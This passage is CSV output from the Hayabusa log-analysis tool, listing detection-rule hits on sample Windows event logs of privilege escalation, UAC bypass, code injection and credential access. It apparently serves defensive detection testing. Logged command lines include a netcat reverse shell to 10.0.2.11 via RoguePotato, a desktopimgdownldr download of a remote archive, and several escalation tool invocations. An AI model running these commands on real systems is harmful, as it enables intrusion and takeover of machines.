Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: NT AUTHORITY\SYSTEM : Parent Command: PrintSpoofer.exe -i -c powershell.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx -2020-05-03 03:01:54.867 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx -2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\whoami.exe"" : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: powershell.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx -2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx -2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx -2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx -2020-05-07 22:13:02.481 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""c:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\ChangePk.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_61_Changepk.evtx -2020-05-10 09:09:36.635 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: NetworkServiceExploit.exe -i -c ""c:\Windows\System32\cmd.exe"" : Path: C:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: ""cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx -2020-05-10 09:09:36.709 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: c:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: NetworkServiceExploit.exe -i -c ""c:\Windows\System32\cmd.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx -2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: c:\Windows\System32\cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx -2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx -2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx -2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx -2020-05-10 09:11:16.714 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx -2020-05-12 08:21:56.493 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: RoguePotato.exe -r 10.0.2.11 -e ""c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe"" -l 9999 : Path: C:\Users\IEUser\Tools\PrivEsc\RoguePotato.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: ""cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx -2020-05-12 08:21:56.519 +09:00,MSEDGEWIN10,17,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx -2020-05-12 08:21:56.562 +09:00,MSEDGEWIN10,18,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx -2020-05-12 08:21:56.587 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe : Path: C:\Users\IEUser\Tools\Misc\nc64.exe : User: NT AUTHORITY\SYSTEM : Parent Command: RoguePotato.exe -r 10.0.2.11 -e ""c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe"" -l 9999",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx -2020-05-12 08:21:56.661 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx -2020-05-12 08:22:26.650 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx -2020-05-12 08:22:26.650 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx -2020-05-12 08:22:26.650 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx -2020-05-13 00:06:49.019 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: Akagi.exe 58 c:\Windows\System32\cmd.exe : Path: C:\Users\IEUser\Tools\PrivEsc\Akagi.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx -2020-05-13 00:06:49.019 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx -2020-05-13 00:06:49.211 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 328 310 0000028A37652590 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx -2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe -o -previd pe386 : Path: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\DllHost.exe /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41},rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx -2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx -2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,high,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx -2020-05-13 00:06:49.447 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: c:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe -o -previd pe386,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx -2020-05-13 09:28:16.122 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s PlugPlay,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx -2020-05-13 09:28:52.873 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx -2020-05-13 09:28:52.914 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx -2020-05-13 09:28:52.950 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceAndNoImpersonation -p -s wcncsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx -2020-05-24 10:13:47.756 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: RogueWinRM.exe -p c:\Windows\System32\cmd.exe : Path: C:\Users\IEUser\Tools\PrivEsc\RogueWinRM.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: ""cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx -2020-05-24 10:13:48.864 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx -2020-05-24 10:13:50.327 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: c:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: RogueWinRM.exe -p c:\Windows\System32\cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx -2020-05-24 10:13:51.206 +09:00,MSEDGEWIN10,3,high,Remote PowerShell Session,,rules/sigma/network_connection/sysmon_remote_powershell_session_network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx -2020-05-24 10:13:51.206 +09:00,MSEDGEWIN10,3,high,Remote PowerShell Session,,rules/sigma/network_connection/sysmon_remote_powershell_session_network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx -2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: c:\Windows\System32\cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx -2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx -2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx -2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx -2020-07-01 05:50:25.546 +09:00,MSEDGEWIN10,10,critical,Direct Syscall of NtOpenProcess,,rules/sigma/process_access/sysmon_direct_syscall_ntopenprocess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_10_Evasion_Suspicious_NtOpenProcess_CallTrace.evtx -2020-07-01 05:50:25.546 +09:00,MSEDGEWIN10,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_10_Evasion_Suspicious_NtOpenProcess_CallTrace.evtx -2020-07-03 02:51:37.819 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: spooler.exe payload.bin : Path: C:\Users\Public\tools\cinj\spooler.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx -2020-07-03 02:51:37.819 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx -2020-07-03 02:51:37.872 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: notepad : Path: C:\Windows\System32\notepad.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\System32\spoolsv.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx -2020-07-03 02:51:37.872 +09:00,MSEDGEWIN10,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx -2020-07-03 03:00:29.615 +09:00,LAPTOP-JU4M3I0E,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: chost.exe payload.bin : Path: C:\Users\Public\tools\evasion\chost.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx -2020-07-03 03:00:29.615 +09:00,LAPTOP-JU4M3I0E,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx -2020-07-03 03:00:29.650 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: notepad : Path: C:\Windows\System32\notepad.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: \??\C:\windows\system32\conhost.exe 0xffffffff -ForceV1,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx -2020-07-03 03:00:29.650 +09:00,LAPTOP-JU4M3I0E,1,medium,Conhost Parent Process Executions,,rules/sigma/process_creation/win_susp_conhost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx -2020-07-03 03:00:29.650 +09:00,LAPTOP-JU4M3I0E,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx -2020-07-03 17:47:20.037 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx -2020-07-03 17:47:20.037 +09:00,MSEDGEWIN10,1,high,Suspicious Desktopimgdownldr Command,,rules/sigma/process_creation/win_susp_desktopimgdownldr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx -2020-07-03 17:47:20.073 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr : Path: C:\Windows\System32\desktopimgdownldr.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx -2020-07-03 17:47:20.073 +09:00,MSEDGEWIN10,1,high,Suspicious Desktopimgdownldr Command,,rules/sigma/process_creation/win_susp_desktopimgdownldr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx -2020-07-03 17:47:21.491 +09:00,MSEDGEWIN10,11,high,Suspicious Desktopimgdownldr Target File,,rules/sigma/file_event/win_susp_desktopimgdownldr_file.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx -2020-07-03 17:55:49.123 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Download LockScreen Image : URL: https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/windows_bits_4_59_60_lolbas desktopimgdownldr.evtx -2020-07-03 18:05:58.278 +09:00,win10.ecorp.com,1,informational,Process Creation,"Command: explorer.exe /root,""c:\windows\System32\calc.exe"" : Path: C:\Windows\explorer.exe : User: ECORP\Administrator : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx -2020-07-03 18:05:58.278 +09:00,win10.ecorp.com,1,medium,Explorer Root Flag Process Tree Break,,rules/sigma/process_creation/win_susp_explorer_break_proctree.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx -2020-07-03 18:05:58.278 +09:00,win10.ecorp.com,1,low,Proxy Execution Via Explorer.exe,,rules/sigma/process_creation/win_susp_explorer.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx -2020-07-03 18:05:58.367 +09:00,win10.ecorp.com,1,informational,Process Creation,"Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding : Path: C:\Windows\explorer.exe : User: ECORP\Administrator : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx -2020-07-03 18:05:58.583 +09:00,win10.ecorp.com,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: ECORP\Administrator : Parent Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx -2020-07-03 18:05:58.739 +09:00,win10.ecorp.com,1,informational,Process Creation,"Command: ""C:\Windows\System32\win32calc.exe"" : Path: C:\Windows\System32\win32calc.exe : User: ECORP\Administrator : Parent Command: ""C:\Windows\System32\calc.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx -2020-07-04 23:18:58.268 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/evasion_persis_hidden_run_keyvalue_sysmon_13.evtx -2020-07-04 23:18:58.268 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/evasion_persis_hidden_run_keyvalue_sysmon_13.evtx -2020-07-08 06:51:39.204 +09:00,LAPTOP-JU4M3I0E,10,high,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx -2020-07-08 06:51:39.256 +09:00,LAPTOP-JU4M3I0E,10,high,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx -2020-07-08 06:51:39.262 +09:00,LAPTOP-JU4M3I0E,10,high,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx -2020-07-09 06:41:52.449 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_12_DE_AntiForensics_MRU_DeleteKey.evtx -2020-07-09 06:41:52.449 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_12_DE_AntiForensics_MRU_DeleteKey.evtx -2020-07-09 06:42:01.653 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_12_DE_AntiForensics_MRU_DeleteKey.evtx -2020-07-09 06:42:01.653 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_12_DE_AntiForensics_MRU_DeleteKey.evtx -2020-07-09 06:43:13.791 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_12_DE_AntiForensics_MRU_DeleteKey.evtx -2020-07-09 06:43:13.791 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_12_DE_AntiForensics_MRU_DeleteKey.evtx -2020-07-10 05:41:04.488 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ATACORE01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx -2020-07-10 05:41:04.490 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: PKI01$ : IP Address: ::ffff:10.23.23.9 : Status: 